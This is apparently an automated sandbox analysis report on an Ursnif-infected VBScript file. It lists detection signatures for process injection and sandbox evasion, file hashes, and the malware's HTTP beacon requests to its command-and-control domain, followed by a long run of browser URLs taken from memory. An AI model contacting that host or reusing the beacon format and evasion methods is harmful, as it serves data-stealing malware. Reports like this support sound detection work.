Analysis Report my_presentation_96642.vbs

Overview

General Information

Sample Name: my_presentation_96642.vbs
Analysis ID: 286676
MD5: 2e44ef40fba0da489e9c15ff7c64692c
SHA1: 2b28439329860c37a6f73e9560c717e4f3962a4f
SHA256: bfd79682733c250d046f4174c4b5eb8df75f1132d7e6ac2aa0b5c4ad95419ab6

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Deletes itself after installation
Found Tor onion address
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

Multi AV Scanner detection for domain / URL
Source: api10.laptok.at Virustotal: Detection: 7%
Multi AV Scanner detection for submitted file
Source: my_presentation_96642.vbs Virustotal: Detection: 14%
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local

Networking:

Found Tor onion address
Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: global traffic HTTP traffic detected: GET /api1/zeKdvS5_2Fn9oM_2F/coexB5hfv5Xq/BKUHttHYtNW/us6FE9_2B_2B06/DIA0XeFh6yzS1LY6s1oCH/O6I0fMOtxB_2FaMK/P_2FmFM_2F8ypR7/dx9hXoLcsTTkQCtqPt/jQT_2FP3D/Vu_2Br5n_2F72Y040sm_/2BshdGM4o4B1uUiNO_2/F9Br33BkXML4fx8yq9Jct6/kljeBXeVRXyBC/jH9YPFqS/oW_2BnptlSOO3fjce7eFLQs/cjY_2B3b6K/0jP5qluzKD5UfBlPH/Yyy63TkrNQlk/H6h_0A_0DaA/_2FxxiWhza0HQw/PJfj9KaKc_2Fqn7RK3nQF/t9F36pLVv5/WExF HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/xTmMAvfM8U78kER_2F7EJnC/bkGInMvNpG/6BP8y1_2BixUNH8Ya/1_2BJ2jwUqv1/PwAIg5Ci1Fp/NLUjkZDJX0Lhz0/_2B3Sl0fwWX3wVqK9fb0z/7prGaa1jNih_2FOl/e3_2BA_2FKyguNE/6gpQxTR29SWNVBzUiX/ooUjtYHSM/WJ2P7LXY0oqriYCDuUO5/6JGdRDFUFc7agHutM4Y/a7EEiaV_2B0Drpu7We2Elq/RNdw4UnphUm43/8yKUJrxx/MzdqD4aHhzJD6hXinP_2B_2/F_0A_0D_2F/yCrsh4eR2L6X7FBWv/KfYirZe4p8lP/b6dEfEFP0Hl/t0eFrlqKA0UbT2/NIFmqja4/0WX_2BS HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/Ux95d5jvhDWgBFPIM/ok4wfBCrkY7o/rzRFNM5ZLlT/J64_2FA7bIXm0V/Azl4bbI6xGQ8EFIKznixG/GIj81mj5k3B7TX2D/fTUrCzDV3sDdRNL/bMPSf9FVeacVj6Vh6g/21pfsCJp2/EOpd_2B8C24lKh5Q2hDj/jl4XV9jmwt81YjEedHm/Tvg4EvsmItvP2bpxHHYerN/GLMMgTJoYNBZD/lWpad5rU/ln_2FWDRI9hu_2B3EPbvwjD/xVOTspfDX3/s2TnvfY8e1XD_0A_0/D9Osa1XJDU3_/2BhSFJPYg7H/ypXm94knvghV5F/1R2_2FzWrhbikgq4I9drg/0B61m_2Bo/Km_2FnHXX/v HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: msapplication.xml1.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x21e87356,0x01d68cbc</date><accdate>0x21e87356,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x21e87356,0x01d68cbc</date><accdate>0x21e87356,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x21ed3819,0x01d68cbc</date><accdate>0x21ed3819,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x21ed3819,0x01d68cbc</date><accdate>0x21ed3819,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x21ef9a54,0x01d68cbc</date><accdate>0x21ef9a54,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x21ef9a54,0x01d68cbc</date><accdate>0x21ef9a54,0x01d68cbc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 16 Sep 2020 21:30:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 00000024.00000000.653677419.0000000005840000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000024.00000000.642401117.0000000000E60000.00000002.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/Ux95d5jvhDWgBFPIM/ok4wfBCrkY7o/rzRFNM5ZLlT/J64_2FA7bIXm0V/Azl4bbI6x
Source: {4B9FB8EA-F8AF-11EA-90E2-ECF4BB862DED}.dat.19.dr, ~DFED50CD2992DAC186.TMP.19.dr String found in binary or memory: http://api10.laptok.at/api1/Ux95d5jvhDWgBFPIM/ok4wfBCrkY7o/rzRFNM5ZLlT/J64_2FA7bIXm0V/Azl4bbI6xGQ8EF
Source: {4B9FB8E8-F8AF-11EA-90E2-ECF4BB862DED}.dat.19.dr, ~DFEC43E79FA2AE0F5E.TMP.19.dr String found in binary or memory: http://api10.laptok.at/api1/xTmMAvfM8U78kER_2F7EJnC/bkGInMvNpG/6BP8y1_2BixUNH8Ya/1_2BJ2jwUqv1/PwAIg5
Source: {4B9FB8E6-F8AF-11EA-90E2-ECF4BB862DED}.dat.19.dr, ~DFFF962DDB9C468E8F.TMP.19.dr String found in binary or memory: http://api10.laptok.at/api1/zeKdvS5_2Fn9oM_2F/coexB5hfv5Xq/BKUHttHYtNW/us6FE9_2B_2B06/DIA0XeFh6yzS1L
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.653677419.0000000005840000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000024.00000000.662624699.000000000E2C2000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000006.00000003.579535833.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579647192.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.646154649.0000000002800000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579582589.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.587774108.000000000512B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579617735.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.685503621.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579669420.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579729595.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579690205.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.701647863.00000000027B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579713449.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
